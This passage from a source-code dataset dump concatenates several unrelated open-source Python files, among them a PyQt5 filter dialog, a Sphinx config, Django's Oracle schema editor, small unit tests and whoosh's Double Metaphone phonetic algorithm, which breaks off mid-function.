return datetime.datetime.fromtimestamp(self.fields['doneDate'])
def format_eta(self):
"""
Returns the attribute *eta* formatted as a string.
* If eta is -1 the result is 'not available'
* If eta is -2 the result is 'unknown'
* Otherwise eta is formatted as <days> <hours>:<minutes>:<seconds>.
"""
eta = self.fields['eta']
if eta == -1:
return 'not available'
elif eta == -2:
return 'unknown'
else:
return format_timedelta(self.eta)
@property
def priority(self):
"""
Get the priority as string.
Can be one of 'low', 'normal', 'high'.
"""
return PRIORITY[self.fields['bandwidthPriority']]
|
pablosuau/pyBacklogger
|
refs/heads/master
|
views/filter_dialog.py
|
1
|
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'filter_dialog.ui'
#
# Created by: PyQt5 UI code generator 5.9
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_FilterDialog(object):
def setupUi(self, FilterDialog):
FilterDialog.setObjectName("FilterDialog")
FilterDialog.resize(255, 368)
FilterDialog.setMinimumSize(QtCore.QSize(255, 368))
FilterDialog.setMaximumSize(QtCore.QSize(255, 368))
icon = QtGui.QIcon()
icon.addPixmap(QtGui.QPixmap(":/app_icon/shelf.png"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
FilterDialog.setWindowIcon(icon)
self.tabCategory = QtWidgets.QTabWidget(FilterDialog)
self.tabCategory.setGeometry(QtCore.QRect(0, 0, 401, 321))
self.tabCategory.setTabShape(QtWidgets.QTabWidget.Rounded)
self.tabCategory.setObjectName("tabCategory")
self.tabSystem = QtWidgets.QWidget()
self.tabSystem.setObjectName("tabSystem")
self.pushButtonDeselectAllSystem = QtWidgets.QPushButton(self.tabSystem)
self.pushButtonDeselectAllSystem.setGeometry(QtCore.QRect(90, 7, 75, 23))
self.pushButtonDeselectAllSystem.setObjectName("pushButtonDeselectAllSystem")
self.pushButtonSelectAllSystem = QtWidgets.QPushButton(self.tabSystem)
self.pushButtonSelectAllSystem.setGeometry(QtCore.QRect(10, 7, 75, 23))
self.pushButtonSelectAllSystem.setObjectName("pushButtonSelectAllSystem")
self.listSystem = QtWidgets.QListView(self.tabSystem)
self.listSystem.setGeometry(QtCore.QRect(10, 40, 231, 241))
self.listSystem.setObjectName("listSystem")
self.tabCategory.addTab(self.tabSystem, "")
self.tabStatus = QtWidgets.QWidget()
self.tabStatus.setObjectName("tabStatus")
self.pushButtonDeselectAllStatus = QtWidgets.QPushButton(self.tabStatus)
self.pushButtonDeselectAllStatus.setGeometry(QtCore.QRect(90, 7, 75, 23))
self.pushButtonDeselectAllStatus.setObjectName("pushButtonDeselectAllStatus")
self.pushButtonSelectAllStatus = QtWidgets.QPushButton(self.tabStatus)
self.pushButtonSelectAllStatus.setGeometry(QtCore.QRect(10, 7, 75, 23))
self.pushButtonSelectAllStatus.setObjectName("pushButtonSelectAllStatus")
self.listStatus = QtWidgets.QListView(self.tabStatus)
self.listStatus.setGeometry(QtCore.QRect(10, 40, 231, 241))
self.listStatus.setObjectName("listStatus")
self.tabCategory.addTab(self.tabStatus, "")
self.tabLabel = QtWidgets.QWidget()
self.tabLabel.setObjectName("tabLabel")
self.pushButtonDeselectAllLabel = QtWidgets.QPushButton(self.tabLabel)
self.pushButtonDeselectAllLabel.setGeometry(QtCore.QRect(90, 7, 75, 23))
self.pushButtonDeselectAllLabel.setObjectName("pushButtonDeselectAllLabel")
self.pushButtonSelectAllLabel = QtWidgets.QPushButton(self.tabLabel)
self.pushButtonSelectAllLabel.setGeometry(QtCore.QRect(10, 7, 75, 23))
self.pushButtonSelectAllLabel.setObjectName("pushButtonSelectAllLabel")
self.listLabel = QtWidgets.QListView(self.tabLabel)
self.listLabel.setGeometry(QtCore.QRect(10, 40, 231, 241))
self.listLabel.setObjectName("listLabel")
self.tabCategory.addTab(self.tabLabel, "")
self.tabDifficulty = QtWidgets.QWidget()
self.tabDifficulty.setObjectName("tabDifficulty")
self.pushButtonSelectAllDifficulty = QtWidgets.QPushButton(self.tabDifficulty)
self.pushButtonSelectAllDifficulty.setGeometry(QtCore.QRect(10, 7, 75, 23))
self.pushButtonSelectAllDifficulty.setObjectName("pushButtonSelectAllDifficulty")
self.pushButtonDeselectAllDifficulty = QtWidgets.QPushButton(self.tabDifficulty)
self.pushButtonDeselectAllDifficulty.setGeometry(QtCore.QRect(90, 7, 75, 23))
self.pushButtonDeselectAllDifficulty.setObjectName("pushButtonDeselectAllDifficulty")
self.listDifficulty = QtWidgets.QListView(self.tabDifficulty)
self.listDifficulty.setGeometry(QtCore.QRect(10, 40, 231, 241))
self.listDifficulty.setObjectName("listDifficulty")
self.tabCategory.addTab(self.tabDifficulty, "")
self.pushButtonCancel = QtWidgets.QPushButton(FilterDialog)
self.pushButtonCancel.setGeometry(QtCore.QRect(170, 330, 75, 23))
self.pushButtonCancel.setObjectName("pushButtonCancel")
self.pushButtonOk = QtWidgets.QPushButton(FilterDialog)
self.pushButtonOk.setGeometry(QtCore.QRect(90, 330, 75, 23))
self.pushButtonOk.setObjectName("pushButtonOk")
self.retranslateUi(FilterDialog)
self.tabCategory.setCurrentIndex(0)
QtCore.QMetaObject.connectSlotsByName(FilterDialog)
def retranslateUi(self, FilterDialog):
_translate = QtCore.QCoreApplication.translate
FilterDialog.setWindowTitle(_translate("FilterDialog", "Filter"))
self.pushButtonDeselectAllSystem.setText(_translate("FilterDialog", "Deselect all"))
self.pushButtonSelectAllSystem.setText(_translate("FilterDialog", "Select all"))
self.tabCategory.setTabText(self.tabCategory.indexOf(self.tabSystem), _translate("FilterDialog", "System"))
self.pushButtonDeselectAllStatus.setText(_translate("FilterDialog", "Deselect all"))
self.pushButtonSelectAllStatus.setText(_translate("FilterDialog", "Select all"))
self.tabCategory.setTabText(self.tabCategory.indexOf(self.tabStatus), _translate("FilterDialog", "Status"))
self.pushButtonDeselectAllLabel.setText(_translate("FilterDialog", "Deselect all"))
self.pushButtonSelectAllLabel.setText(_translate("FilterDialog", "Select all"))
self.tabCategory.setTabText(self.tabCategory.indexOf(self.tabLabel), _translate("FilterDialog", "Label"))
self.pushButtonSelectAllDifficulty.setText(_translate("FilterDialog", "Select all"))
self.pushButtonDeselectAllDifficulty.setText(_translate("FilterDialog", "Deselect all"))
self.tabCategory.setTabText(self.tabCategory.indexOf(self.tabDifficulty), _translate("FilterDialog", "Difficulty"))
self.pushButtonCancel.setText(_translate("FilterDialog", "Cancel"))
self.pushButtonOk.setText(_translate("FilterDialog", "Ok"))
import views.app_icon_rc
|
jmenglund/pandas-validation
|
refs/heads/master
|
docs/source/conf.py
|
1
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# pandas-validation documentation build configuration file, created by
# sphinx-quickstart on Tue Jan 19 09:45:10 2016.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
import sphinx_rtd_theme
from re import match
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# Add project directory to sys.path
sys.path.insert(0, os.path.abspath("../.."))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.intersphinx',
'sphinx.ext.ifconfig',
'sphinx.ext.napoleon',
]
# Napoleon settings
napoleon_google_docstring = True
napoleon_numpy_docstring = True
napoleon_include_private_with_doc = False
napoleon_include_special_with_doc = True
napoleon_use_admonition_for_examples = False
napoleon_use_admonition_for_notes = False
napoleon_use_admonition_for_references = False
napoleon_use_ivar = False
napoleon_use_param = True
napoleon_use_rtype = True
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = 'pandas-validation'
copyright = '2016–2019, Markus Englund'
author = 'Markus Englund'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
version = match(
r'(^\d+\.\d+)', __import__('pandasvalidation').__version__).group(0)
# The full version, including alpha/beta/rc tags.
release = __import__('pandasvalidation').__version__
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_test*.py', 'setup.py']
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'sphinx_rtd_theme'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
html_theme_path = [sphinx_rtd_theme.get_html_theme_path()]
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Language to be used for generating the HTML full-text search index.
# Sphinx supports the following languages:
# 'da', 'de', 'en', 'es', 'fi', 'fr', 'h', 'it', 'ja'
# 'nl', 'no', 'pt', 'ro', 'r', 'sv', 'tr'
#html_search_language = 'en'
# A dictionary with options for the search language support, empty by default.
# Now only 'ja' uses this config value
#html_search_options = {'type': 'default'}
# The name of a javascript file (relative to the configuration directory) that
# implements a search results scorer. If empty, the default will be used.
#html_search_scorer = 'scorer.js'
# Output file base name for HTML help builder.
htmlhelp_basename = 'pandas-validationdoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
# Latex figure (float) alignment
#'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'pandas-validation.tex', 'pandas-validation Documentation',
'Markus Englund', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'pandas-validation', 'pandas-validation Documentation',
[author], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'pandas-validation', 'pandas-validation Documentation',
author, 'pandas-validation', 'Validation of data in pandas.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#texinfo_no_detailmenu = False
# Example configuration for intersphinx: refer to the Python standard library.
intersphinx_mapping = {
'python': ('http://docs.python.org/', None),
'pandas': ('http://pandas.pydata.org/pandas-docs/stable/', None)
}
nitpick_ignore = [('py:class', 'Warning')]
|
maxsocl/django
|
refs/heads/master
|
django/db/backends/oracle/schema.py
|
118
|
import binascii
import copy
import datetime
from django.db.backends.base.schema import BaseDatabaseSchemaEditor
from django.db.utils import DatabaseError
from django.utils import six
from django.utils.encoding import force_text
class DatabaseSchemaEditor(BaseDatabaseSchemaEditor):
sql_create_column = "ALTER TABLE %(table)s ADD %(column)s %(definition)s"
sql_alter_column_type = "MODIFY %(column)s %(type)s"
sql_alter_column_null = "MODIFY %(column)s NULL"
sql_alter_column_not_null = "MODIFY %(column)s NOT NULL"
sql_alter_column_default = "MODIFY %(column)s DEFAULT %(default)s"
sql_alter_column_no_default = "MODIFY %(column)s DEFAULT NULL"
sql_delete_column = "ALTER TABLE %(table)s DROP COLUMN %(column)s"
sql_delete_table = "DROP TABLE %(table)s CASCADE CONSTRAINTS"
def quote_value(self, value):
if isinstance(value, (datetime.date, datetime.time, datetime.datetime)):
return "'%s'" % value
elif isinstance(value, six.string_types):
return "'%s'" % six.text_type(value).replace("\'", "\'\'")
elif isinstance(value, six.buffer_types):
return "'%s'" % force_text(binascii.hexlify(value))
elif isinstance(value, bool):
return "1" if value else "0"
else:
return str(value)
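    # Illustrative behaviour, derived from the branches above:
    #   quote_value("O'Reilly") -> "'O''Reilly'"
    #   quote_value(True)       -> "1"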
def delete_model(self, model):
# Run superclass action
super(DatabaseSchemaEditor, self).delete_model(model)
# Clean up any autoincrement trigger
self.execute("""
DECLARE
i INTEGER;
BEGIN
SELECT COUNT(*) INTO i FROM USER_CATALOG
WHERE TABLE_NAME = '%(sq_name)s' AND TABLE_TYPE = 'SEQUENCE';
IF i = 1 THEN
EXECUTE IMMEDIATE 'DROP SEQUENCE "%(sq_name)s"';
END IF;
END;
/""" % {'sq_name': self.connection.ops._get_sequence_name(model._meta.db_table)})
def alter_field(self, model, old_field, new_field, strict=False):
try:
# Run superclass action
super(DatabaseSchemaEditor, self).alter_field(model, old_field, new_field, strict)
except DatabaseError as e:
description = str(e)
# If we're changing to/from LOB fields, we need to do a
# SQLite-ish workaround
if 'ORA-22858' in description or 'ORA-22859' in description:
self._alter_field_lob_workaround(model, old_field, new_field)
else:
raise
def _alter_field_lob_workaround(self, model, old_field, new_field):
"""
Oracle refuses to change a column type from/to LOB to/from a regular
column. In Django, this shows up when the field is changed from/to
a TextField.
What we need to do instead is:
- Add the desired field with a temporary name
- Update the table to transfer values from old to new
- Drop old column
- Rename the new column
"""
# Make a new field that's like the new one but with a temporary
# column name.
new_temp_field = copy.deepcopy(new_field)
new_temp_field.column = self._generate_temp_name(new_field.column)
# Add it
self.add_field(model, new_temp_field)
# Transfer values across
self.execute("UPDATE %s set %s=%s" % (
self.quote_name(model._meta.db_table),
self.quote_name(new_temp_field.column),
self.quote_name(old_field.column),
))
# Drop the old field
self.remove_field(model, old_field)
# Rename the new field
self.alter_field(model, new_temp_field, new_field)
def normalize_name(self, name):
"""
Get the properly shortened and uppercased identifier as returned by
quote_name(), but without the actual quotes.
"""
nn = self.quote_name(name)
if nn[0] == '"' and nn[-1] == '"':
nn = nn[1:-1]
return nn
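    # Illustrative (the exact result depends on the Oracle ops quote_name()):
    #   normalize_name("django_content_type") -> 'DJANGO_CONTENT_TYPE'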
def _generate_temp_name(self, for_name):
"""
Generates temporary names for workarounds that need temp columns
"""
suffix = hex(hash(for_name)).upper()[1:]
return self.normalize_name(for_name + "_" + suffix)
def prepare_default(self, value):
return self.quote_value(value)
|
amol9/mutils
|
refs/heads/master
|
redlib/test/testlib/test_testorder.py
|
2
|
from unittest import TestCase, main as ut_main
from redlib.testlib.testorder import order
class TestTestOrder(TestCase):
reg = []
@order(0)
def test_zero(self):
self.assertEqual(len(self.reg), 0)
self.reg.append(0)
@order(1)
def test_one(self):
self.assertEqual(len(self.reg), 1)
self.assertEqual(self.reg, [0])
self.reg.append(1)
@order(2)
def test_two(self):
self.assertEqual(len(self.reg), 2)
self.assertEqual(self.reg, [0, 1])
self.reg.append(2)
class TestDefaultOrder(TestCase):
reg = []
def test_a(self):
self.assertEqual(len(self.reg), 0)
self.reg.append(0)
def test_b(self):
self.assertEqual(len(self.reg), 1)
self.assertEqual(self.reg, [0])
self.reg.append(1)
def test_c(self):
self.assertEqual(len(self.reg), 2)
self.assertEqual(self.reg, [0, 1])
self.reg.append(2)
if __name__ == '__main__':
ut_main()
|
andrewfu0325/gem5-aladdin
|
refs/heads/ruby
|
tests/quick/se/02.insttest/test.py
|
56
|
# Copyright (c) 2007 The Regents of The University of Michigan
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met: redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer;
# redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution;
# neither the name of the copyright holders nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Authors: Ali Saidi
root.system.cpu[0].workload = LiveProcess(cmd = 'insttest',
executable = binpath('insttest'))
|
PJB3005/MoMMI
|
refs/heads/v2
|
MoMMI/module.py
|
1
|
from typing import Dict, Any
class MModule(object):
def __init__(self, name: str) -> None:
from .handler import MHandler
self.name: str = name
self.handlers: Dict[str, MHandler] = {}
self.loaded: bool = False
# The actual module
self.module: Any = None
|
bdh1011/cupeye
|
refs/heads/master
|
venv/lib/python2.7/site-packages/whoosh/lang/dmetaphone.py
|
96
|
# coding= utf-8
# This script implements the Double Metaphone algorithm (c) 1998, 1999 by
# Lawrence Philips. It was translated to Python from the C source written
# by Kevin Atkinson (http://aspell.net/metaphone/) by Andrew Collins in
# January 2007, who claims no rights to this work.
# http://atomboy.isa-geek.com:8080/plone/Members/acoil/programing/double-metaphone
import re
from whoosh.compat import u
vowels = frozenset("AEIOUY")
slavo_germ_exp = re.compile("W|K|CZ|WITZ")
silent_starts = re.compile("GN|KN|PN|WR|PS")
def double_metaphone(text):
text = text.upper()
slavo_germanic = bool(slavo_germ_exp.search(text))
length = len(text)
text = "--" + text + " "
first = pos = 2
last = first + length - 1
primary = secondary = ""
if silent_starts.match(text, pos):
pos += 1
while pos < length + 2:
ch = text[pos]
if ch in vowels:
# all init vowels now map to 'A'
if pos != first:
next = (None, 1)
else:
next = ("A", 1)
elif ch == "B":
#"-mb", e.g", "dumb", already skipped over... see 'M' below
if text[pos + 1] == "B":
next = ("P", 2)
else:
next = ("P", 1)
elif ch == "C":
# various germanic
if (pos > (first + 1) and text[pos - 2] not in vowels and text[pos - 1:pos + 2] == 'ACH' and \
(text[pos + 2] not in ['I', 'E'] or text[pos - 2:pos + 4] in ['BACHER', 'MACHER'])):
next = ('K', 2)
# special case 'CAESAR'
elif pos == first and text[first:first + 6] == 'CAESAR':
next = ('S', 2)
elif text[pos:pos + 4] == 'CHIA': # italian 'chianti'
next = ('K', 2)
elif text[pos:pos + 2] == 'CH':
# find 'michael'
if pos > first and text[pos:pos + 4] == 'CHAE':
next = ('K', 'X', 2)
elif pos == first and (text[pos + 1:pos + 6] in ['HARAC', 'HARIS'] or \
text[pos + 1:pos + 4] in ["HOR", "HYM", "HIA", "HEM"]) and text[first:first + 5] != 'CHORE':
next = ('K', 2)
# germanic, greek, or otherwise 'ch' for 'kh' sound
elif text[first:first + 4] in ['VAN ', 'VON '] or text[first:first + 3] == 'SCH' \
or text[pos - 2:pos + 4] in ["ORCHES", "ARCHIT", "ORCHID"] \
or text[pos + 2] in ['T', 'S'] \
or ((text[pos - 1] in ["A", "O", "U", "E"] or pos == first) \
and text[pos + 2] in ["L", "R", "N", "M", "B", "H", "F", "V", "W", " "]):
next = ('K', 1)
else:
if pos > first:
if text[first:first + 2] == 'MC':
next = ('K', 2)
else:
next = ('X', 'K', 2)
else:
next = ('X', 2)
# e.g., 'czerny'
elif text[pos:pos + 2] == 'CZ' and text[pos - 2:pos + 2] != 'WICZ':
next = ('S', 'X', 2)
# e.g., 'focaccia'
elif text[pos + 1:pos + 4] == 'CIA':
next = ('X', 3)
# double 'C', but not if e.g. 'McClellan'
elif text[pos:pos + 2] == 'CC' and not (pos == (first + 1) and text[first] == 'M'):
# 'bellocchio' but not 'bacchus'
if text[pos + 2] in ["I", "E", "H"] and text[pos + 2:pos + 4] != 'HU':
# 'accident', 'accede' 'succeed'
if (pos == (first + 1) and text[first] == 'A') or \
text[pos - 1:pos + 4] in ['UCCEE', 'UCCES']:
next = ('KS', 3)
# 'bacci', 'bertucci', other italian
else:
next = ('X', 3)
else:
next = ('K', 2)
elif text[pos:pos + 2] in ["CK", "CG", "CQ"]:
next = ('K', 'K', 2)
elif text[pos:pos + 2] in ["CI", "CE", "CY"]:
# italian vs. english
if text[pos:pos + 3] in ["CIO", "CIE", "CIA"]:
next = ('S', 'X', 2)
else:
next = ('S', 2)
else:
# name sent in 'mac caffrey', 'mac gregor'
if text[pos + 1:pos + 3] in [" C", " Q", " G"]:
next = ('K', 3)
else:
if text[pos + 1] in ["C", "K", "Q"] and text[pos + 1:pos + 3] not in ["CE", "CI"]:
next = ('K', 2)
else: # default for 'C'
next = ('K', 1)
elif ch == u('\xc7'):
next = ('S', 1)
elif ch == 'D':
if text[pos:pos + 2] == 'DG':
if text[pos + 2] in ['I', 'E', 'Y']: # e.g. 'edge'
next = ('J', 3)
else:
next = ('TK', 2)
elif text[pos:pos + 2] in ['DT', 'DD']:
next = ('T', 2)
else:
next = ('T', 1)
elif ch == 'F':
if text[pos + 1] == 'F':
next = ('F', 2)
else:
next = ('F', 1)
elif ch == 'G':
if text[pos + 1] == 'H':
if pos > first and text[pos - 1] not in vowels:
next = ('K', 2)
elif pos < (first + 3):
if pos == first: # 'ghislane', ghiradelli
if text[pos + 2] == 'I':
next = ('J', 2)
else:
next = ('K', 2)
# Parker's rule (with some further refinements) - e.g., 'hugh'
elif (pos > (first + 1) and text[pos - 2] in ['B', 'H', 'D']) \
or (pos > (first + 2) and text[pos - 3] in ['B', 'H', 'D']) \
or (pos > (first + 3) and text[pos - 4] in ['B', 'H']):
next = (None, 2)
else:
# e.g., 'laugh', 'McLaughlin', 'cough', 'gough', 'rough', 'tough'
if pos > (first + 2) and text[pos - 1] == 'U' \
and text[pos - 3] in ["C", "G", "L", "R", "T"]:
next = ('F', 2)
else:
if pos > first and text[pos - 1] != 'I':
next = ('K', 2)
elif text[pos + 1] == 'N':
if pos == (first + 1) and text[first] in vowels and not slavo_germanic:
next = ('KN', 'N', 2)
else:
# not e.g. 'cagney'
if text[pos + 2:pos + 4] != 'EY' and text[pos + 1] != 'Y' and not slavo_germanic:
next = ('N', 'KN', 2)
else:
next = ('KN', 2)
# 'tagliaro'
elif text[pos + 1:pos + 3] == 'LI' and not slavo_germanic:
next = ('KL', 'L', 2)
# -ges-,-gep-,-gel-, -gie- at beginning
elif pos == first and (text[pos + 1] == 'Y' \
or text[pos + 1:pos + 3] in ["ES", "EP", "EB", "EL", "EY", "IB", "IL", "IN", "IE", "EI", "ER"]):
next = ('K', 'J', 2)
# -ger-, -gy-
elif (text[pos + 1:pos + 3] == 'ER' or text[pos + 1] == 'Y') \
and text[first:first + 6] not in ["DANGER", "RANGER", "MANGER"] \
and text[pos - 1] not in ['E', 'I'] and text[pos - 1:pos + 2] not in ['RGY', 'OGY']:
next = ('K', 'J', 2)
# italian, e.g. 'biaggi'
elif text[pos + 1] in ['E', 'I', 'Y'] or text[pos - 1:pos + 3] in ["AGGI", "OGGI"]:
# obvious germanic
if text[first:first + 4] in ['VON ', 'VAN '] or text[first:first + 3] == 'SCH' \
or text[pos + 1:pos + 3] == 'ET':
next = ('K', 2)
else:
# always soft if french ending
if text[pos + 1:pos + 5] == 'IER ':
next = ('J', 2)
else:
next = ('J', 'K', 2)
elif text[pos + 1] == 'G':
next = ('K', 2)
else:
next = ('K', 1)
elif ch == 'H':
# only keep if first & before vowel or between 2 vowels
if (pos == first or text[pos - 1] in vowels) and text[pos + 1] in vowels:
next = ('H', 2)
else: # (also takes care of 'HH')
next = (None, 1)
elif ch == 'J':
# obvious spanish, 'jose', 'san jacinto'
if text[pos:pos + 4] == 'JOSE' or text[first:first + 4] == 'SAN ':
if (pos == first and text[pos + 4] == ' ') or text[first:first + 4] == 'SAN ':
next = ('H',)
else:
next = ('J', 'H')
elif pos == first and text[pos:pos + 4] != 'JOSE':
next = ('J', 'A') # Yankelovich/Jankelowicz
else:
# spanish pron. of e.g. 'bajador'
if text[pos - 1] in vowels and not slavo_germanic \
and text[pos + 1] in ['A', 'O']:
next = ('J', 'H')
else:
if pos == last:
next = ('J', ' ')
else:
if text[pos + 1] not in ["L", "T", "K", "S", "N", "M", "B", "Z"] \
and text[pos - 1] not in ["S", "K", "L"]:
next = ('J',)
else:
next = (None,)
if text[pos + 1] == 'J':
next = next + (2,)
else:
next = next + (1,)
elif ch == 'K':
if text[pos + 1] == 'K':
next = ('K', 2)
else:
next = ('K', 1)
elif ch == 'L':
if text[pos + 1] == 'L':
# spanish e.g. 'cabrillo', 'gallegos'
if (pos == (last - 2) and text[pos - 1:pos + 3] in ["ILLO", "ILLA", "ALLE"]) \
or ((text[last - 1:last + 1] in ["AS", "OS"] or text[last] in ["A", "O"]) \
and text[pos - 1:pos + 3] == 'ALLE'):
next = ('L', '', 2)
else:
next = ('L', 2)
else:
next = ('L', 1)
elif ch == 'M':
if text[pos + 1:pos + 4] == 'UMB' \
and (pos + 1 == last or text[pos + 2:pos + 4] == 'ER') \
or text[pos + 1] == 'M':
next = ('M', 2)
else:
next = ('M', 1)
elif ch == 'N':
if text[pos + 1] == 'N':
next = ('N', 2)
else:
next = ('N', 1)
elif ch == u('\xd1'):
next = ('N', 1)
elif ch == 'P':
if text[pos + 1] == 'H':
next = ('F', 2)
elif text[pos + 1] in ['P', 'B']: # also account for "campbell", "raspberry"
next = ('P', 2)
else:
next = ('P', 1)
elif ch == 'Q':
if text[pos + 1] == 'Q':
next = ('K', 2)
else:
next = ('K', 1)
elif ch == 'R':
# french e.g. 'rogier', but exclude 'hochmeier'
if pos == last and not slavo_germanic \
and text[pos - 2:pos] == 'IE' and text[pos - 4:pos - 2] not in ['ME', 'MA']:
next = ('', 'R')
else:
next = ('R',)
if text[pos + 1] == 'R':
next = next + (2,)
else:
next = next + (1,)
elif ch == 'S':
# special cases 'island', 'isle', 'carlisle', 'carlysle'
if text[pos - 1:pos + 2] in ['ISL', 'YSL']:
next = (None, 1)
# special case 'sugar-'
elif pos == first and text[first:first + 5] == 'SUGAR':
next = ('X', 'S', 1)
elif text[pos:pos + 2] == 'SH':
# germanic
if text[pos + 1:pos + 5] in ["HEIM", "HOEK", "HOLM", "HOLZ"]:
next = ('S', 2)
else:
